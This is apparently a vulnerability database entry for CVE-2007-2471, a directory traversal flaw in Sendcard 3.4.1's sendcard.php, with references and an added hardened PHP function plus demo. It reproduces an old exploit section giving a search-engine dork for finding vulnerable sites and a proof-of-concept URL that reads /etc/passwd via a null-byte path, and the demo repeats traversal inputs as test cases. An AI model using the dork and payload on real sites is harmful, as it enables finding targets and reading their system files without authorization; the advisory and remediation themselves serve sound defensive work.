Sendcard 'sendcard.php' Directory Traversal Vulnerability

Vulnerability ID: 1112826
Vulnerability type: Path traversal
Published: 2007-05-01
Updated: 2007-05-02
CVE ID: CVE-2007-2471
CNNVD-ID: CNNVD-200705-026
Platform: PHP
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/3827
https://www.securityfocus.com/bid/86203
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-026
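|Vulnerability details
A directory traversal vulnerability exists in sendcard.php in Sendcard. A remote attacker can read arbitrary files via a full pathname in the form parameter.
|Exploit (EXP)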
Sendcard  (sendcard.php) Sendcard Local File Inclusion Vulnerability

Discovered: ettee
Dork: "Powered by sendcard - an advanced PHP e-card program" -site:sendcard.org
         "powered by Sendcard"

Bug:
"// Get the template details
if(!isset($form) || $form == ''){
    $form = "form";
}
if(!isset($des) || $des == ''){
    $des = "card";
}
if (!isset($template) || $template == '') {
    $template = 'message';
}"

PoC:
http://[site]/[path]/sendcard.php?form=/etc/passwd%00

# milw0rm.com [2007-05-01]
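
A hardened way to handle the `form`, `des` and `template` parameters from the Bug snippet above, as an added example that is not Sendcard's code and not part of the original advisory. It assumes, which the page does not show, that each value names a template file in one fixed directory; the `.tpl` extension, the directory layout and the helper name `resolve_template()` are hypothetical.

```php
<?php
// Added example, not Sendcard's code. Assumption: each parameter names a
// template file that lives in one fixed directory (hypothetical layout).

/**
 * Map a request parameter to a template file inside $baseDir.
 * A missing or invalid value falls back to $default, as the original
 * snippet does for empty values.
 */
function resolve_template(?string $value, string $default, string $baseDir): string
{
    // Accept only a short bare name: slashes, dots, NUL bytes and
    // percent signs cannot pass, so "/etc/passwd\0" is never used.
    if ($value === null || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $value)) {
        $value = $default;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('template directory missing');
    }

    // Defence in depth: resolve symlinks, then confirm the result is
    // still located under the template directory.
    $path = realpath($base . DIRECTORY_SEPARATOR . $value . '.tpl');
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('template not found');
    }
    return $path;
}

// Constructed demo: a throwaway template directory and four sample inputs.
$dir = sys_get_temp_dir() . '/sendcard_demo_' . getmypid();
mkdir($dir);
foreach (['form', 'card', 'message'] as $name) {
    file_put_contents("$dir/$name.tpl", "template $name\n");
}

foreach ([null, 'card', "/etc/passwd\0", '../../etc/passwd'] as $in) {
    $resolved = resolve_template($in, 'form', $dir);
    printf("%-22s -> %s\n", json_encode($in, JSON_UNESCAPED_SLASHES), basename($resolved));
}

// Remove the demo files again.
array_map('unlink', glob("$dir/*.tpl"));
rmdir($dir);
```
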
|Affected products
Sendcard Sendcard 3.4.1
|References

Source: XF
Name: sendcard-sendcard-file-include(33995)
Link: http://xforce.iss.net/xforce/xfdb/33995
Source: SECUNIA
Name: 25085
Link: http://secunia.com/advisories/25085
Source: MILW0RM
Name: 3827
Link: http://milw0rm.com/exploits/3827